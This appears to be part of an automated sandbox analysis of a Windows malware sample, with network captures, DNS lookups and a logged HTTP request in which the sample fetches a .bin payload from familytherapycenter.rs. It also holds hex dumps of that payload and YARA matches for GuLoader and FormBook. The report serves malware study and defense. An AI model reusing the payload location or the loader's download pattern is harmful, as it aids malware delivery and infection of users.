                                        Nov 6, 2024 13:56:01.588414907 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.588484049 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.588680983 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.588781118 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.589221001 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.589263916 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.655848026 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.655929089 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.656398058 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.656456947 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.656889915 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.656949043 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.657156944 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.657212019 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.657598019 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.657649040 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.658252954 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.658305883 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.741055012 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.741069078 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.741111994 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.741158009 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.741197109 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.741214037 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.741230965 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.741467953 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.741532087 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.741699934 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.741765976 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.741771936 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.741789103 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.741810083 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.741837978 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.750005007 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.750020981 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:02.750044107 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:02.750065088 CET49907443192.168.2.4188.40.95.144
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 6, 2024 13:55:45.655469894 CET5849853192.168.2.41.1.1.1
                                        Nov 6, 2024 13:55:46.660967112 CET5849853192.168.2.41.1.1.1
                                        Nov 6, 2024 13:55:47.660917044 CET5849853192.168.2.41.1.1.1
                                        Nov 6, 2024 13:55:49.660993099 CET5849853192.168.2.41.1.1.1
                                        Nov 6, 2024 13:55:49.821856022 CET53584981.1.1.1192.168.2.4
                                        Nov 6, 2024 13:55:49.821883917 CET53584981.1.1.1192.168.2.4
                                        Nov 6, 2024 13:55:49.821898937 CET53584981.1.1.1192.168.2.4
                                        Nov 6, 2024 13:55:49.822046995 CET53584981.1.1.1192.168.2.4
                                        Nov 6, 2024 13:55:59.834985971 CET5850253192.168.2.41.1.1.1
                                        Nov 6, 2024 13:55:59.938257933 CET53585021.1.1.1192.168.2.4
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 6, 2024 13:55:45.655469894 CET192.168.2.41.1.1.10x7faStandard query (0)familytherapycenter.rsA (IP address)IN (0x0001)false
                                        Nov 6, 2024 13:55:46.660967112 CET192.168.2.41.1.1.10x7faStandard query (0)familytherapycenter.rsA (IP address)IN (0x0001)false
                                        Nov 6, 2024 13:55:47.660917044 CET192.168.2.41.1.1.10x7faStandard query (0)familytherapycenter.rsA (IP address)IN (0x0001)false
                                        Nov 6, 2024 13:55:49.660993099 CET192.168.2.41.1.1.10x7faStandard query (0)familytherapycenter.rsA (IP address)IN (0x0001)false
                                        Nov 6, 2024 13:55:59.834985971 CET192.168.2.41.1.1.10x6290Standard query (0)familytherapycenter.rsA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 6, 2024 13:55:49.821856022 CET1.1.1.1192.168.2.40x7faServer failure (2)familytherapycenter.rsnonenoneA (IP address)IN (0x0001)false
                                        Nov 6, 2024 13:55:49.821883917 CET1.1.1.1192.168.2.40x7faServer failure (2)familytherapycenter.rsnonenoneA (IP address)IN (0x0001)false
                                        Nov 6, 2024 13:55:49.821898937 CET1.1.1.1192.168.2.40x7faServer failure (2)familytherapycenter.rsnonenoneA (IP address)IN (0x0001)false
                                        Nov 6, 2024 13:55:49.822046995 CET1.1.1.1192.168.2.40x7faServer failure (2)familytherapycenter.rsnonenoneA (IP address)IN (0x0001)false
                                        Nov 6, 2024 13:55:59.938257933 CET1.1.1.1192.168.2.40x6290No error (0)familytherapycenter.rs188.40.95.144A (IP address)IN (0x0001)false
                                        • familytherapycenter.rs
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449907188.40.95.1444437904C:\Users\user\Desktop\5112024976.exe
                                        TimestampBytes transferredDirectionData
                                        2024-11-06 12:56:00 UTC187OUTGET /FWMRlymkKxgrni33.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                        Host: familytherapycenter.rs
                                        Cache-Control: no-cache
                                        2024-11-06 12:56:01 UTC320INHTTP/1.1 200 OK
                                        Date: Wed, 06 Nov 2024 12:56:01 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Tue, 05 Nov 2024 12:17:57 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 287296
                                        Cache-Control: max-age=172800
                                        Expires: Fri, 08 Nov 2024 12:56:01 GMT
                                        Content-Type: application/octet-stream
                                        2024-11-06 12:56:01 UTC7872INData Raw: a5 c9 5a 94 21 a2 63 a2 a1 00 eb 3f c9 3c 74 b5 8d 5d 9c 56 9b cb 20 c3 33 4c 03 52 40 bc 0f 4e 32 1a f5 47 ba 44 8c a8 1a 99 1b df 2c b0 c7 b3 14 9b 39 34 a5 a1 72 e1 8a ed 51 ce d6 94 65 6d 78 af a9 5c 4c 1f 7e f7 60 5b 4a 55 70 8e bc 67 0d 09 c8 3d a4 4b 4c bb b6 5d 37 76 31 65 29 74 b4 68 ca 68 58 66 2b 8e b7 89 1a bf 89 8c 4d d2 26 47 a4 13 a0 c9 9a 9a 2a 81 37 df 32 78 eb e7 79 11 8e 08 a2 81 91 0b 5c 72 02 24 8a 5a 2e 36 0c 83 46 30 37 40 d6 10 c6 a2 d1 b9 11 f1 f4 f9 bc 31 d1 e7 5f 9e ec be 27 b8 cd cb 86 e7 53 5c 29 80 9b 6d 99 29 07 b0 7a 42 cc 70 60 84 f4 14 8c 72 12 ab 3c 69 9c f2 d8 4e 35 be 74 d7 44 03 5e 00 d6 5c e6 21 ac 8e 02 d1 7f f9 54 88 1d 63 60 0e a5 1d c5 e1 3b 5a 7f 2a f4 2c 43 a0 91 55 b1 4b 36 c5 f6 61 62 35 f0 da eb 07 7a 94 ee
                                        Data Ascii: Z!c?<t]V 3LR@N2GD,94rQemx\L~`[JUpg=KL]7v1e)thhXf+M&G*72xy\r$Z.6F07@1_'S\)m)zBp`r<iN5tD^\!Tc`;Z*,CUK6ab5z
                                        2024-11-06 12:56:01 UTC8000INData Raw: b9 12 d1 8b 00 20 f6 eb 30 6f 24 cc 5f c7 97 8d cd 14 ec e6 fe fd 3a a4 18 c9 c7 94 04 f5 f9 4f 5f 1f 05 ac 3c d3 c4 f1 cb bb b9 27 c1 78 10 cd c2 fb bf 54 4a 10 eb 92 9f 98 c3 6e d0 76 02 07 21 ea 8d 70 fd 33 46 90 f8 64 44 94 c9 d7 c5 a4 88 10 56 ad e3 98 01 92 d6 5f 3a d9 23 d6 28 0e 31 55 be 16 dc e6 90 74 64 14 5e 83 ae a9 bd 8d ad 19 bc 82 d6 59 b8 87 50 fa 47 9e 9c 85 89 07 2b 75 ef c6 96 46 e8 d3 dd c4 ae f3 a9 17 59 0a 6a 9c 0c 27 6f 0c bf c8 86 c1 41 07 51 62 9b 60 f1 1a 20 5b 05 44 fa 2b e1 38 83 c4 19 3a 5b 7a f4 a0 f1 77 86 a6 0a e9 cc 9d ce 76 37 e0 92 0d ca 54 d1 70 69 73 c9 fa cc ca 88 14 2d 3b db 9a bf 6a 97 b0 0e 08 55 d8 a2 17 be 5e 34 d3 ee 4d 9c 96 d0 72 b5 63 b2 5e 64 e5 a8 6b c2 bc e1 7e d9 f0 38 01 20 7c 89 3d 26 86 69 2b 2f b4 b3
                                        Data Ascii: 0o$_:O_<'xTJnv!p3FdDV_:#(1Utd^YPG+uFYj'oAQb` [D+8:[zwv7Tpis-;jU^4Mrc^dk~8 |=&i+/
                                        2024-11-06 12:56:01 UTC8000INData Raw: f1 6a bf 1e 6c 1f d5 81 11 30 35 56 5f bb 06 cc b9 6c 38 ec a8 e3 4e b5 af 4e 49 03 af 25 fa b2 5f 5c 90 72 06 05 0f 6f be a2 65 32 c3 88 13 09 38 a9 c7 ab 00 d6 b9 9f 23 e5 e6 32 ac 8e f1 f1 3d 91 9c 45 f5 b3 ce 6b 34 47 c8 95 de f7 d2 3d 1d b2 f0 40 fb 5c 16 38 c8 c1 c5 7c dc 8a 72 d8 d7 a5 a4 dd ca 06 22 cc 8e 6a c7 70 ca 23 21 3f 18 1c 91 77 be a0 73 c3 95 ee e4 a7 58 98 50 6b 25 6f c7 48 5b 73 08 2c c0 09 00 91 10 c5 a8 f8 a9 63 19 2b c7 13 0e fb ce df d8 28 32 13 ee d5 8f 12 8f 4d e3 7a eb 82 4f cc 10 25 28 97 ea 2b 46 11 41 05 65 5f 6c d9 67 5c e7 63 f4 a5 fa 50 00 82 db a5 af 58 00 19 a5 d1 ad cc c0 ab 06 d9 52 d7 fa 5e 01 04 4a a2 70 ad 24 1c 06 de eb 3f 39 74 cc fd a0 d5 e2 c1 62 24 13 2a 0f d4 04 9f 04 f0 78 48 05 9a bc 9a 49 5e ea 1a 72 00 76
                                        Data Ascii: jl05V_l8NNI%_\roe28#2=Ek4G=@\8|r"jp#!?wsXPk%oH[s,c+(2MzO%(+FAe_lg\cPXR^Jp$?9tb$*xHI^rv
                                        2024-11-06 12:56:01 UTC8000INData Raw: 91 f2 1b be 1c 9e 0a fa c8 5a 53 b0 81 82 5d fa a9 75 84 0f 83 1c 89 40 e2 ad 42 31 1a e4 56 93 30 94 68 40 e5 dd 0f 15 68 00 4d 21 2d 35 22 49 c3 cd 1c c2 1e 9b ac 28 0b 3d df 90 5b f6 dc 7b f6 67 2b e1 44 b6 30 cf f2 af 32 bb 51 75 8b a7 3a 51 7b 3f 01 21 96 5c 51 49 87 60 a8 e3 68 81 49 66 49 02 ac 40 fd ff 87 e6 c8 87 78 97 fe da ef 81 e2 5c 77 4b c7 d2 64 38 6a b2 28 e8 01 78 2b 36 be f1 41 b1 b1 39 45 52 40 a0 0c 19 6b 2f c2 d7 be f1 93 ca 90 75 16 d9 bb e0 28 53 50 19 22 64 58 ab 8b 88 d6 a6 ff c9 90 33 6d 4a d2 a9 c8 62 99 41 cd d0 bb 61 41 e0 c6 43 6e e7 f8 ee 44 4f 3e 7b b2 2d 53 61 22 84 37 7f ec e8 6f 82 e8 e3 28 5c b1 5f de 9c e2 c7 bf 73 74 98 ae df 25 5f 2c 82 9c 19 3c 78 0f 35 96 37 db ea 86 47 0a 4d 96 2b 1f 28 c4 88 87 00 81 ac f7 f2 4d
                                        Data Ascii: ZS]u@B1V0h@hM!-5"I(=[{g+D02Qu:Q{?!\QI`hIfI@x\wKd8j(x+6A9ER@k/u(SP"dX3mJbAaACnDO>{-Sa"7o(\_st%_,<x57GM+(M
                                        2024-11-06 12:56:01 UTC8000INData Raw: f0 87 65 95 7b 75 9f f7 c5 32 94 43 e6 29 56 f6 73 58 5d 60 e3 ad 99 c4 ec 1f ea 52 62 01 24 28 5d 91 01 35 e7 0f 07 26 43 79 2b 3c 98 d6 db 17 d1 f7 79 11 ed 19 49 bc 6f b9 3e a6 63 1c 32 dc ea ec f2 c3 3c 2d 62 17 de d9 97 75 35 86 25 49 26 2f d2 22 b5 8e cf 55 00 63 f4 1f 46 e0 29 56 1b c6 f3 b3 88 54 d6 26 14 46 01 15 d8 2a 4d 82 ad d8 7c 11 b8 e7 06 54 35 15 ee 1a 04 6e 96 9d 5c 57 c2 33 3e 0e 91 de 7d 5b 9b 9b 76 91 ab 2d f6 98 6c b4 81 6f ff 2a ce d8 21 43 b0 84 a1 8d ec 3a 81 a2 7f 9c 5e 5b 47 48 48 95 8f 0a 51 b0 93 02 6b 7b 12 38 ad d3 1e d6 71 2f 99 97 4e cf 28 d0 a7 d6 f8 e6 c9 35 9b c7 85 a3 75 fb 38 e4 87 29 a4 65 29 5c 92 1e bc de dc 06 75 3d 36 62 ba d2 2f 91 8e c7 62 5f 36 47 c2 75 98 f3 4a fd 87 a4 cf e6 1f d5 63 8f 69 8d 3f 20 3f f2 16
                                        Data Ascii: e{u2C)VsX]`Rb$(]5&Cy+<yIo>c2<-bu5%I&/"UcF)VT&F*M|T5n\W3>}[v-lo*!C:^[GHHQk{8q/N(5u8)e)\u=6b/b_6GuJci? ?
                                        2024-11-06 12:56:01 UTC8000INData Raw: 98 5e 32 5a 13 42 41 f3 a9 0f 00 0f f0 6d 95 2c d6 1b 73 ca 4f 41 5a 17 c7 85 9f ff 52 1f fe a4 74 ac 3f 21 55 62 31 80 6e 45 39 1e e4 59 bc 36 af f6 4e 37 30 de da f3 6c ca df b7 6f 14 25 e4 a1 b8 8a 6d 6b cf 5a 45 12 21 ee 14 c3 f9 36 e4 4b 83 c4 03 31 9c 8c 3b 94 4e 9d 5e 54 e8 a6 80 3c 25 33 d2 9d ff 46 90 32 bc d7 fd 42 3c 3d 97 79 2c 26 9d 1d 52 3a 1d b1 a0 e9 ce 94 17 35 1e 8f 6b 47 da 5f 99 ed 3a fc 62 9b cc b6 a8 11 d7 82 ba af 62 d8 30 fb d6 42 42 d6 3c 8b dd 30 f8 66 9f 8a 34 f3 26 cf 3f fc 1d b5 27 e4 35 da 77 a6 60 88 55 ab 04 85 90 b9 c7 7d 2f c2 7d 57 a2 af c8 70 94 99 8a 91 1c 6b 3f 99 fc 5e 37 1f d8 cc 23 9c 67 1b 49 fb 5c bc 42 08 43 ce 32 b1 29 46 11 c4 05 66 8a 35 6a f8 5d ee 81 07 d3 1a 82 f7 b2 f2 83 72 bc da 58 df 4b 18 82 12 cf 19
                                        Data Ascii: ^2ZBAm,sOAZRt?!Ub1nE9Y6N70lo%mkZE!6K1;N^T<%3F2B<=y,&R:5kG_:bb0BB<0f4&?'5w`U}/}Wpk?^7#gI\BC2)Ff5j]rXK
                                        2024-11-06 12:56:01 UTC8000INData Raw: 93 1e a3 0b fe 8d da c1 c5 6b 51 93 c4 e9 eb eb 55 36 bd 6a e6 24 fa f9 6a 32 e6 68 b7 aa fc 25 c3 b5 83 1f 1d 94 69 da ba ce 8b ce 30 1c f1 c8 5c b4 43 b6 2e b2 da ae 71 ff 8e 76 6f 8e 12 0e 2d 7b e7 d1 81 71 0a ea c4 9f ee b2 cd b8 85 c9 92 80 b5 a0 a1 79 fe 96 94 6b 8a 00 e6 49 5c be f1 8c 54 f6 05 9c cf 7e 1c bf 86 62 47 28 9e fa 6f a8 c6 06 20 15 83 26 e0 43 cf ca dc f1 6d a5 df 59 16 b0 fe 13 cb 24 95 3e 34 97 67 41 b4 c9 d2 01 3f 3e 99 c7 70 76 d9 2f 8a 59 ed fa f7 d2 c3 15 4d 25 bc e2 9b ba 97 86 2f 0f 98 3a 15 11 4c 42 49 61 22 fe e4 11 55 31 0b e4 81 9b 6e ab e5 54 e9 d8 7f 16 f1 7c ad 33 a7 8b 19 78 34 2a 44 68 a3 7c e1 0a a7 09 33 02 a3 b0 5d 46 49 f7 76 75 48 27 6e 0d 4d 9e 85 12 3b 6f 87 1c 03 9a ab 0d ea e5 27 b2 c5 e7 f9 f3 2e 00 b7 f9 88
                                        Data Ascii: kQU6j$j2h%i0\C.qvo-{qykI\T~bG(o &CmY$>4gA?>pv/YM%/:LBIa"U1nT|3x4*Dh|3]FIvuH'nM;o'.
                                        2024-11-06 12:56:01 UTC8000INData Raw: cf 01 a9 8a e9 66 d2 ef ad ad 5b 52 b6 70 e5 90 28 48 0d e5 89 88 db f9 ee 6c 94 b0 77 f1 b8 72 b2 01 1b fa 20 a2 68 b3 c9 b6 42 cf bc 59 aa e4 ed c6 b5 c9 93 91 e8 e1 9e 84 fb 4d 34 75 e2 81 08 39 9b b0 1e 16 28 0d 7d 5f 6d 21 13 fe 61 a5 48 04 1d 54 47 78 74 12 a5 8c 3f 12 fa d9 66 35 86 46 c2 6f 3a d6 f1 d9 56 1b 38 65 ec 7f cf 3c 85 f3 94 48 05 7a 3f 6b 15 12 ec 5d c0 5e 37 7f a4 88 f5 16 20 1f ea a8 f1 55 28 14 71 3f 66 a5 30 b5 58 43 4e 6c 0a 84 ec 29 25 a5 d1 6a d1 06 5a 64 ac 3e 17 fb 8e af 8c b1 5a 1e ab 8b 08 26 82 ea e8 6c df c5 db 38 c3 8e d3 d8 fe 11 f9 c8 f7 14 e1 bf dc ec 76 58 17 ba 80 b5 4e 22 18 51 57 70 08 84 88 be 83 24 2d e2 01 d2 59 fe 8c cd 9c ef 2a 6f 72 d9 d0 e5 96 60 5f 63 22 59 37 7f f4 65 04 40 57 fc fa 67 66 82 ab cf 30 9f 8f
                                        Data Ascii: f[Rp(Hlwr hBYM4u9(}_m!aHTGxt?f5Fo:V8e<Hz?k]^7 U(q?f0XCNl)%jZd>Z&l8vXN"QWp$-Y*or`_c"Y7e@Wgf0
                                        2024-11-06 12:56:01 UTC8000INData Raw: 1c a9 7c 5d 9d c9 2e 0b 10 d2 47 c4 bd c1 a9 f7 a5 e0 73 b9 46 8a 8b 05 1b c7 73 f9 4a 05 86 ed b9 03 e3 36 69 c8 0b 50 7b 3a 75 84 94 78 42 98 47 ea db f7 b5 03 0f 3c 50 cc 4d 29 9a d9 2c 48 b3 c2 09 21 9d 98 07 4a d8 67 47 ed 0f c5 56 90 01 d8 8b 7d cf 24 de 60 c7 86 98 da 86 01 ca 82 49 0e 2d c9 80 ec ef a0 df 78 6f 48 5a d0 03 21 17 04 41 f7 42 34 79 91 b3 08 09 3a be b3 e1 c3 f2 60 56 9d d7 9e 8b b2 a8 ba e9 e3 f6 b3 ba 96 78 44 13 6f bd fc f7 bb f5 f1 39 f5 a7 fc 1b 2d 25 64 9c 56 fe c9 73 ea 41 78 1d f3 84 e2 a8 03 4a e1 d0 65 fe db 44 a0 62 ba de 18 56 d7 63 da 28 04 a3 35 1d 28 20 c2 50 e7 ad 21 53 b3 ec 9f c7 af 63 88 2d 1a 63 cc 4c 42 31 9c 2b 1e 9c d0 be a3 fd 5f 58 a5 00 0c bc 8d 4d 8a e4 5f 4f 26 66 9d d5 4e f5 dd 77 1f a9 be be ee a2 a8 fa
                                        Data Ascii: |].GsFsJ6iP{:uxBG<PM),H!JgGV}$`I-xoHZ!AB4y:`VxDo9-%dVsAxJeDbVc(5( P!Sc-cLB1+_XM_O&fNw
                                        2024-11-06 12:56:01 UTC8000INData Raw: 38 38 d5 02 3f bb 86 49 e5 a8 4a be 64 4c f6 5d 46 a7 80 19 a0 5d 68 8b e1 bf 03 27 e3 41 02 70 c7 9b d1 21 1b 71 b7 c2 c9 ef b1 69 b3 6c 08 0b b4 7f ed 10 a7 0d 77 22 42 4d 87 55 8d 10 52 be 26 05 50 17 d3 12 34 50 08 34 5b 43 15 7c d1 51 67 13 c6 2e 24 46 4d 35 d2 bd 5b 42 5d 38 be 4c ad e1 73 0d 48 ce 6a 60 8d fa d4 76 ed a6 aa 50 ed 66 e1 dc b4 aa 6d d6 a6 01 cb 0d fb f8 fd c5 67 ae a7 20 7a c8 37 af 42 83 9e af 44 2a f1 2e 0f 82 d1 0c e0 ca 69 06 0a bc d0 67 32 75 62 ac 40 9d 91 0b 5d 1e bd c3 56 0f 8d 39 3c ad 94 cd 5b d8 00 bb 6c 8c c3 ac bc c0 d7 18 51 b8 bd 85 d4 db 06 4d 3c 4f 2a 87 22 87 fe f3 4b 68 11 b7 73 d0 76 21 35 a4 c2 a7 38 e7 0e 78 fb a0 b1 a2 e4 c0 91 ef eb ed f9 70 aa f2 a1 aa 1e b0 00 e2 c9 18 5d f9 34 5e 89 13 3f db 7a 63 88 fe ca
                                        Data Ascii: 88?IJdL]F]h'Ap!qilw"BMUR&P4P4[C|Qg.$FM5[B]8LsHj`vPfmg z7BD*.ig2ub@]V9<[lQM<O*"Khsv!58xp]4^?zc


                                        Click to jump to process

                                        Click to jump to process

                                        Click to jump to process

                                        Target ID:0
                                        Start time:07:54:28
                                        Start date:06/11/2024
                                        Path:C:\Users\user\Desktop\5112024976.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\5112024976.exe"
                                        Imagebase:0x400000
                                        File size:1'224'768 bytes
                                        MD5 hash:35826E4E9E0DB5CE7A5E95D34C34E2DA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2358263323.0000000004980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:07:55:36
                                        Start date:06/11/2024
                                        Path:C:\Users\user\Desktop\5112024976.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\5112024976.exe"
                                        Imagebase:0x400000
                                        File size:1'224'768 bytes
                                        MD5 hash:35826E4E9E0DB5CE7A5E95D34C34E2DA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3280941030.0000000036020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        No disassembly